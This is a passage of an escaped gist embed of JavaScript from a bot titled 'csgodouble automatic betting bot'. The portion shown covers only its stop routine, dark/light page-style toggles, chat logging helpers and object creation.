blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L592\" class=\"blob-num js-line-number\" data-line-number=\"592\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC592\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L593\" class=\"blob-num js-line-number\" data-line-number=\"593\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC593\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.stop = function(abort) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L594\" class=\"blob-num js-line-number\" data-line-number=\"594\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC594\" class=\"blob-code blob-code-inner js-file-line\"> var self = this;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L595\" class=\"blob-num js-line-number\" data-line-number=\"595\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC595\" class=\"blob-code blob-code-inner js-file-line\"> if (abort) { this.last_result = &#39;abort&#39;; }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L596\" class=\"blob-num js-line-number\" data-line-number=\"596\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC596\" class=\"blob-code blob-code-inner js-file-line\"> this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L597\" class=\"blob-num js-line-number\" data-line-number=\"597\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC597\" class=\"blob-code blob-code-inner js-file-line\"> setTimeout(function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L598\" class=\"blob-num js-line-number\" data-line-number=\"598\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC598\" class=\"blob-code blob-code-inner js-file-line\"> clearInterval(self.game);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L599\" class=\"blob-num js-line-number\" data-line-number=\"599\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC599\" class=\"blob-code blob-code-inner js-file-line\"> self.game = null;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L600\" class=\"blob-num js-line-number\" data-line-number=\"600\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC600\" class=\"blob-code blob-code-inner js-file-line\"> self.running = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L601\" class=\"blob-num js-line-number\" data-line-number=\"601\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC601\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.abort.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L602\" class=\"blob-num js-line-number\" data-line-number=\"602\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC602\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.stop.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L603\" class=\"blob-num js-line-number\" data-line-number=\"603\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC603\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.start.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L604\" class=\"blob-num js-line-number\" data-line-number=\"604\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC604\" class=\"blob-code blob-code-inner js-file-line\"> }, 1); // Next tick<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L605\" class=\"blob-num js-line-number\" data-line-number=\"605\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC605\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L606\" class=\"blob-num js-line-number\" data-line-number=\"606\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC606\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L607\" class=\"blob-num js-line-number\" data-line-number=\"607\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC607\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.darkMode = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L608\" class=\"blob-num js-line-number\" data-line-number=\"608\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC608\" class=\"blob-code blob-code-inner js-file-line\"> var style;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L609\" class=\"blob-num js-line-number\" data-line-number=\"609\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC609\" class=\"blob-code blob-code-inner js-file-line\"> var css = &#39;body{background-color:#191919;color:#888}.navbar-default{background-color:#232323;border-color:#454545}#sidebar{background-color:#191919;border-color:#202020}.side-icon.active,.side-icon:hover{background-color:#202020}.side-icon .fa{color:#454545}.well{background:#232323;border-color:#323232;color:#888}#pullout{background-color:#191919;border-color:#323232}.form-control{background-color:#323232;border-color:#454545}.divchat{background-color:#323232;color:#999;border:none}.chat-link,.chat-link:hover,.chat-link:active{color:#bbb}.panel{background-color:#323232}.panel-default{border-color:#454545}.panel-default&gt;.panel-heading{color:#888;background-color:#303030;border-color:#454545}.my-row{border-color:#454545}.list-group-item{border-color:#454545;background-color:#323232}.btn-default{border-color:#454545;background:#323232;text-shadow:none;color:#888;box-shadow:none}.btn-default:hover,.btn-default:active{background-color:#282828;color:#888;border-color:#454545}.btn-default[disabled]{border-color:#454545;background-color:#353535}.input-group-addon{background-color:#424242;border-color:#454545;color:#888}.progress{color:#bbb;background-color:#323232}.navbar-default .navbar-nav&gt;li&gt;a:focus,.navbar-default .navbar-nav&gt;li&gt;a:hover{color:#999}.navbar-default .navbar-nav&gt;.open&gt;a,.navbar-default .navbar-nav&gt;.open&gt;a:focus,.navbar-default .navbar-nav&gt;.open&gt;a:hover{color:#888;background-color:#323232}.dropdown-menu{background-color:#252525}.dropdown-menu&gt;li&gt;a{color:#888}.dropdown-menu&gt;li&gt;a:focus,.dropdown-menu&gt;li&gt;a:hover{background-color:#323232;color:#999}.dropdown-menu .divider{background-color:#454545}.form-control[disabled],.form-control[readonly],fieldset[disabled] .form-control{background-color:#404040;opacity:.5}&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L610\" class=\"blob-num js-line-number\" data-line-number=\"610\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC610\" class=\"blob-code blob-code-inner js-file-line\"> style = document.getElementById(&#39;automated-style&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L611\" class=\"blob-num js-line-number\" data-line-number=\"611\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC611\" class=\"blob-code blob-code-inner js-file-line\"> if (!style) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L612\" class=\"blob-num js-line-number\" data-line-number=\"612\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC612\" class=\"blob-code blob-code-inner js-file-line\"> var head;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L613\" class=\"blob-num js-line-number\" data-line-number=\"613\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC613\" class=\"blob-code blob-code-inner js-file-line\"> head = document.getElementsByTagName(&#39;head&#39;)[0];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L614\" class=\"blob-num js-line-number\" data-line-number=\"614\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC614\" class=\"blob-code blob-code-inner js-file-line\"> if (!head) { return; }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L615\" class=\"blob-num js-line-number\" data-line-number=\"615\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC615\" class=\"blob-code blob-code-inner js-file-line\"> style = document.createElement(&#39;style&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L616\" class=\"blob-num js-line-number\" data-line-number=\"616\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC616\" class=\"blob-code blob-code-inner js-file-line\"> style.type = &#39;text/css&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L617\" class=\"blob-num js-line-number\" data-line-number=\"617\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC617\" class=\"blob-code blob-code-inner js-file-line\"> style.id = &#39;automated-style&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L618\" class=\"blob-num js-line-number\" data-line-number=\"618\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC618\" class=\"blob-code blob-code-inner js-file-line\"> style.innerHTML = css;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L619\" class=\"blob-num js-line-number\" data-line-number=\"619\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC619\" class=\"blob-code blob-code-inner js-file-line\"> head.appendChild(style);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L620\" class=\"blob-num js-line-number\" data-line-number=\"620\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC620\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L621\" class=\"blob-num js-line-number\" data-line-number=\"621\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC621\" class=\"blob-code blob-code-inner js-file-line\"> style.innerHTML = css;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L622\" class=\"blob-num js-line-number\" data-line-number=\"622\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC622\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L623\" class=\"blob-num js-line-number\" data-line-number=\"623\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC623\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L624\" class=\"blob-num js-line-number\" data-line-number=\"624\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC624\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.lightMode = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L625\" class=\"blob-num js-line-number\" data-line-number=\"625\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC625\" class=\"blob-code blob-code-inner js-file-line\"> var style = document.getElementById(&#39;automated-style&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L626\" class=\"blob-num js-line-number\" data-line-number=\"626\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC626\" class=\"blob-code blob-code-inner js-file-line\"> style.innerHTML = &#39;&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L627\" class=\"blob-num js-line-number\" data-line-number=\"627\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC627\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L628\" class=\"blob-num js-line-number\" data-line-number=\"628\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC628\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L629\" class=\"blob-num js-line-number\" data-line-number=\"629\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC629\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.log = function(message) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L630\" class=\"blob-num js-line-number\" data-line-number=\"630\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC630\" class=\"blob-code blob-code-inner js-file-line\"> chat(&#39;alert&#39;, &#39;[Automated] &#39; + message);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L631\" class=\"blob-num js-line-number\" data-line-number=\"631\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC631\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L632\" class=\"blob-num js-line-number\" data-line-number=\"632\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC632\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L633\" class=\"blob-num js-line-number\" data-line-number=\"633\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC633\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.logdebug = function(message) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L634\" class=\"blob-num js-line-number\" data-line-number=\"634\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC634\" class=\"blob-code blob-code-inner js-file-line\"> chat(&#39;italic&#39;, &#39;[Automated] &#39; + message);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L635\" class=\"blob-num js-line-number\" data-line-number=\"635\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC635\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L636\" class=\"blob-num js-line-number\" data-line-number=\"636\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC636\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L637\" class=\"blob-num js-line-number\" data-line-number=\"637\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC637\" class=\"blob-code blob-code-inner js-file-line\">var automated = new Automated();<\/td>\n <\/tr>\n<\/table>\n\n <\/div>\n\n <\/div>\n \n<\/div>\n\n <\/div>\n <div class=\"gist-meta\">\n <a href=\"https://gist.github.com/asdfhkjkl/11deac99d4867503ae6b11057547c296/raw/afe7e880b94e8135b634a7965a9d4785441dc833/csgodouble%20automatic%20betting%20bot\" style=\"float:right\">view raw<\/a>\n <a href=\"https://gist.github.com/asdfhkjkl/11deac99d4867503ae6b11057547c296#file-csgodouble-automatic-betting-bot\">csgodouble automatic betting bot<\/a>\n hosted with &#10084; by <a href=\"https://github.com\">GitHub<\/a>\n <\/div>\n <\/div>\n<\/div>\n')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement